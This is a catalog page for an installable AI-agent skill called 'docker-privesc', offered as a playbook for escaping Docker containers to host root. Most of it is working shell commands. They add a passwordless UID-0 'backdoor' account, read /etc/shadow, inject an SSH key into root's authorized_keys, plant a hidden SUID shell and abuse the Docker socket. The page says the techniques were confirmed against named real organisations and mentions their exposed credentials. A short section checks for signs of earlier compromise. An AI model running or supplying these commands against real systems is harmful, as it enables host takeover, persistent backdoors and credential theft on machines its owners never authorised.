con un clic
docker-privesc
Escape Docker containers to host root via 5 techniques.
Instalar con Codex o Claude Copia este prompt, pégalo en Codex, Claude u otro asistente, y deja que revise la página de la skill y la instale por ti.
Menú
Escape Docker containers to host root via 5 techniques.
Instalar con Codex o Claude Copia este prompt, pégalo en Codex, Claude u otro asistente, y deja que revise la página de la skill y la instale por ti.
Attack SAML SSO via XSW, signature strip, metadata extract.
Chain multiple vulns into critical impact attack paths.
Execute optimal kill chains for WordPress full compromise.
Catalog: 25 attacks, 18 WP, 8 CORS to match findings.
7-phase pentest pipeline from passive recon to exploitation.
4-phase pipeline for max findings per minute across batches.
| name | docker-privesc |
| description | Escape Docker containers to host root via 5 techniques. |
| version | 1.0.0 |
| author | uphiago |
| license | MIT |
| platforms | ["linux"] |
| compatibility | Requires curl, nmap, python3 |
| disable-model-invocation | true |
| metadata | {"tags":["infra","docker","privilege-escalation","container-escape"],"category":"infra","related_skills":["port-service-discovery","api-noauth-hunt"]} |
Docker container escape and privilege escalation — Docker socket abuse, volume mount host takeover, docker group root-equivalence, and prior-privilege-escalation detection. Docker group membership = instant root on the host via 5 distinct techniques. Confirmed on Smart Fit (Docker containers extracted, 12 image layers, privileged mode) and CGE-RJ (Dockerfile + docker-compose.prod.yml exposed in GitLab).
id shows you're in the docker group or have access to /var/run/docker.sock.docker ps or docker info works from within the container.api-noauth-hunt or wordpress-full-compromise achieves RCE in a container./var/run/docker.sock (check: ls -la /var/run/docker.sock).--privileged flag.# Check docker group membership
id | grep docker && echo "[+] Docker group — instant root possible"
# Check docker socket
ls -la /var/run/docker.sock 2>/dev/null && echo "[+] Docker socket mounted — host escape"
# Check privileged mode
cat /proc/self/status | grep -i "seccomp\|cap" && echo "[*] Check capabilities"
| Condition | Escape Method | Command |
|---|---|---|
| Docker group | Volume mount host / | docker run --rm -v /:/host -it alpine chroot /host |
| Docker socket | Create privileged container | docker run --rm --privileged -v /:/host -it alpine |
--privileged | Direct host filesystem access | mount /dev/sda1 /mnt && chroot /mnt |
SYS_ADMIN cap | cgroup release_agent | Write to cgroup notify_on_release |
| No docker, no caps | Check for mounted sockets/pipes | find / -type s 2>/dev/null |
echo "[*] Container escape surface assessment"
# 1. Docker group
echo -n " Docker group: "
if id | grep -q docker; then
echo "YES — instant root via volume mount"
else
echo "no"
fi
# 2. Docker socket
echo -n " Docker socket: "
if ls -la /var/run/docker.sock 2>/dev/null; then
echo "YES — host escape via docker command"
SOCKET_PERMS=$(stat -c "%a %U:%G" /var/run/docker.sock 2>/dev/null)
echo " Permissions: $SOCKET_PERMS"
else
echo "no"
fi
# 3. Privileged mode
echo -n " Privileged: "
if ip link add dummy0 type dummy 2>/dev/null; then
echo "YES — privileged container"
ip link delete dummy0 2>/dev/null
else
echo "no"
fi
# 4. Capabilities
echo " Capabilities:"
grep CapEff /proc/self/status 2>/dev/null
# 5. Mounted volumes (potential host paths)
echo " Mounted volumes:"
mount | grep -vE "^(overlay|tmpfs|proc|sys|devpts|cgroup)" | head -10
# 6. Host processes visible?
echo -n " Host processes: "
PROC_COUNT=$(ls /proc | grep -c '^[0-9]' 2>/dev/null)
echo "$PROC_COUNT visible"
echo "[*] Docker group privesc"
# Technique 1: Volume mount + add user with UID 0
echo "[1] Adding user with UID 0 to /etc/passwd"
docker run --rm -v /etc:/host_etc alpine sh -c \
'echo "backdoor::0:0::/root:/bin/bash" >> /host_etc/passwd'
su backdoor 2>/dev/null
# Technique 2: Volume mount + read shadow
echo "[2] Reading /etc/shadow"
docker run --rm -v /etc:/host_etc alpine cat /host_etc/shadow 2>/dev/null | head -5
# Technique 3: chroot to host root
echo "[3] Chroot to host root"
docker run --rm -v /:/host -it alpine chroot /host bash -c "id && hostname"
# Technique 4: Inject SSH key
echo "[4] Injecting SSH key to host root"
docker run --rm -v /root:/host_root alpine sh -c \
'mkdir -p /host_root/.ssh && echo "YOUR_SSH_PUB_KEY" >> /host_root/.ssh/authorized_keys'
# Technique 5: Create SUID bash on host
echo "[5] Creating SUID bash on host"
docker run --rm -v /usr/local/bin:/host_bin alpine sh -c \
'cp /bin/sh /host_bin/.backdoor && chmod u+s /host_bin/.backdoor'
/usr/local/bin/.backdoor -p 2>/dev/null
echo "[*] Docker socket exploitation"
# If docker client is available in the container
if command -v docker &>/dev/null; then
echo "[+] Docker client available"
# Create privileged container with host root mounted
docker run --rm --privileged --pid=host -v /:/host alpine sh -c \
"chroot /host bash -c 'id && hostname'"
# Alternative: just exec into an existing host container
docker ps # List running containers
docker exec -it <container_id> /bin/bash
fi
# If docker client is NOT available, install it or use the socket directly
if [[ ! -f /usr/bin/docker ]] && [[ -S /var/run/docker.sock ]]; then
echo "[*] No docker client — using REST API via socket"
curl -sk --unix-socket /var/run/docker.sock http://localhost/containers/json | head -20
fi
echo "[*] Checking for prior privilege escalation on host"
# Check sudoers for NOPASSWD entries (docker privesc technique)
echo " NOPASSWD sudoers:"
grep -r "NOPASSWD" /etc/sudoers /etc/sudoers.d/ 2>/dev/null | head -5
# Check for users with UID 0 (injected via /etc/passwd technique)
echo " UID 0 users:"
awk -F: '$3 == 0 {print $1}' /etc/passwd 2>/dev/null
# Check for newly created authorized_keys files
echo " Root SSH keys:"
ls -la /root/.ssh/authorized_keys 2>/dev/null
stat /root/.ssh/authorized_keys 2>/dev/null | grep Modify
# Check for SUID binaries
echo " New SUID binaries:"
find / -perm -4000 -type f 2>/dev/null | while read f; do
if stat "$f" 2>/dev/null | grep -q "Change:.*2026"; then
echo " $f (recently modified)"
fi
done
.git exposed repository.env exposed with MySQL, Redis, SendGrid, OVH S3 credentialsdocker-compose.prod.yml exposed in public GitLab repositoryapt-get update && apt-get install -y docker.io (if internet access).--privileged is rare. Check CapEff mask to see what's available./etc/shadow from host via volume mount.